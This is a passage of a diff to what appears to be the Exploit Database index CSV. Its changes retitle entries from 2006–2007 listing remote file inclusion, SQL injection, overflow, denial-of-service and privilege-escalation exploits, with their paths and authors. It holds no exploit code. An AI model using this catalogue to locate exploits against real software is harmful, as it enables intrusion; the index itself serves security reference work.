03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0 -2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - (login.asp) SQL Injection",2006-12-09,ajann,asp,webapps,0 +2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) SQL Injection",2006-12-09,ajann,asp,webapps,0 -2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - (vdateUsr.asp) Remote Login ByPass",2006-12-09,ajann,asp,webapps,0 -2910,platforms/multiple/dos/2910.txt,"Sophos Antivirus - .CHM File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos,0 -2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos,0 -2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service (PoC)",2006-12-10,"Damian Put",multiple,dos,0 -2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 -2914,platforms/windows/dos/2914.php,"Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service",2006-12-11,shinnai,windows,dos,0 +2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - (vdateUsr.asp) Remote Login Bypass",2006-12-09,ajann,asp,webapps,0 +2910,platforms/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos,0 +2911,platforms/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos,0 +2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro AntiVirus - '.RAR' File Denial of Service (PoC)",2006-12-10,"Damian Put",multiple,dos,0 +2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - (language.php) Local File Inclusion",2006-12-10,Kacper,php,webapps,0 +2914,platforms/windows/dos/2914.php,"FileZilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service",2006-12-11,shinnai,windows,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service",2006-12-11,poplix,hardware,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0 -2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - (common.php) Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0 +2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps,0 -2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (interface.php) Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps,0 +2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (Interface.php) Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps,0 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Inclusion",2006-12-12,Lu7k,php,webapps,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - (malformed pointer) (PoC)",2006-12-12,DiscoJonny,windows,dos,0 2923,platforms/php/webapps/2923.txt,"BLOG:CMS 4.1.3 - (NP_UserSharing.php) Remote File Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods 2.0.2 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps,0 -2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 +2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0 2927,platforms/php/webapps/2927.txt,"PHPMyCMS 0.3 - (basic.inc.php) Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps,0 2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 -2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 -2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b - (ldap.php) Remote File Inclusion Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 +2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 +2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b - (ldap.php) Remote File Inclusion",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,php,webapps,0 2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0 -2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 +2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 -2937,platforms/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 -2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 +2937,platforms/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution",2006-12-16,Kacper,php,webapps,0 +2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0 2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - (admin/index_sitios.php) File Inclusion",2006-12-18,nuffsaid,php,webapps,0 -2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion Exploit",2006-12-18,Kacper,php,webapps,0 +2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0 2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 @@ -2634,31 +2635,31 @@ id,file,description,date,author,platform,type,port 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 -2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion Exploit",2006-12-19,bd0rk,php,webapps,0 +2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion",2006-12-20,mdx,php,webapps,0 2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - (config/sender.php) Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0 -2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 +2967,platforms/windows/dos/2967.cs,"Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 -2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Transversal",2006-12-21,str0ke,windows,remote,0 +2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - (Urlobox) Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service",2006-12-22,shinnai,windows,dos,0 -2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 -2980,platforms/php/webapps/2980.txt,"EternalMart GuestBook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 -2981,platforms/php/webapps/2981.php,"open newsletter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 +2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 +2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 +2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - (b2verifauth.php) Remote File Inclusion",2006-12-23,mdx,php,webapps,0 -2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Inclusion Exploit",2006-12-23,bd0rk,php,webapps,0 +2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Inclusion",2006-12-23,bd0rk,php,webapps,0 2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service",2006-12-23,gbr,windows,dos,0 2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 2987,platforms/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL Injection / Cross-Site Scripting) Vulnerabilities",2006-12-23,ajann,asp,webapps,0 @@ -2672,17 +2673,17 @@ id,file,description,date,author,platform,type,port 2995,platforms/asp/webapps/2995.htm,"Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2996,platforms/asp/webapps/2996.htm,"Enthrallweb eNews 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2997,platforms/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - (detail.asp) SQL Injection",2006-12-24,ajann,asp,webapps,0 -2998,platforms/asp/webapps/2998.pl,"Newsletter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps,0 -2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 +2998,platforms/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps,0 +2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - (chat/login.php) Code Execution",2006-12-24,nuffsaid,php,webapps,0 3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - (pt_upload.php) Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 3002,platforms/php/webapps/3002.php,"HLStats 1.34 - (hlstats.php) SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 -3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - (include_path) Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 -3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - (admin/admin_settings.php) Remote File Inclusion Exploit",2006-12-25,nuffsaid,php,webapps,0 -3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - (phpbb_root_path) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - (admin/admin_settings.php) Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3007,platforms/php/webapps/3007.txt,"Irokez CMS 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 -3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 +3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 @@ -2694,12 +2695,12 @@ id,file,description,date,author,platform,type,port 3017,platforms/php/webapps/3017.php,"PHP-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 -3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 +3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - (bu/process.php) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 @@ -2710,7 +2711,7 @@ id,file,description,date,author,platform,type,port 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login Bypass SQL Injection",2006-12-28,ajann,asp,webapps,0 -3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 +3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0 @@ -2724,20 +2725,20 @@ id,file,description,date,author,platform,type,port 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3051,platforms/php/webapps/3051.txt,"Wordpress Enigma 2 Bridge Plugin - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 +3051,platforms/php/webapps/3051.txt,"WordPress Enigma 2 Bridge Plugin - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 +3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError Csrss.exe-winsrv.dll Double-Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 -3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 +3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 -3062,platforms/asp/webapps/3062.txt,"autoDealer 2.0 - (detail.asp iPro) SQL Injection",2007-01-01,ajann,asp,webapps,0 -3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Transversal",2007-01-01,Bl0od3r,windows,remote,0 -3064,platforms/multiple/remote/3064.rb,"Apple Quicktime - (rtsp URL Handler) Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0 +3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - (detail.asp iPro) SQL Injection",2007-01-01,ajann,asp,webapps,0 +3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0 +3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"newsCMSlite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (Perl) (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 @@ -2745,12 +2746,12 @@ id,file,description,date,author,platform,type,port 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (PPC) - (udp://) Format String (PoC)",2007-01-02,MoAB,osx,dos,0 3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (x86) - (udp://) Format String Exploit",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 -3072,platforms/windows/remote/3072.py,"Apple Quicktime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 +3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (product_id) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (Product_ID) SQL Injection",2007-01-03,ajann,asp,webapps,0 +3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 -3077,platforms/osx/remote/3077.rb,"Apple Quicktime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 +3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,windows,dos,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - (XML title) Remote Format String (PoC)",2007-01-04,MoAB,osx,dos,0 @@ -2760,31 +2761,31 @@ id,file,description,date,author,platform,type,port 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 -3087,platforms/osx/local/3087.rb,"Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 -3088,platforms/osx/local/3088.rb,"Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3087,platforms/osx/local/3087.rb,"Apple Mac OS X 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3088,platforms/osx/local/3088.rb,"Apple Mac OS X 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 -3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion Exploit",2007-01-07,Codebreak,php,webapps,0 +3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - (AMG_serverpath) Remote File Inclusion",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Privilege Escalation",2007-01-07,"Critical Security",bsd,local,0 -3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 +3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' 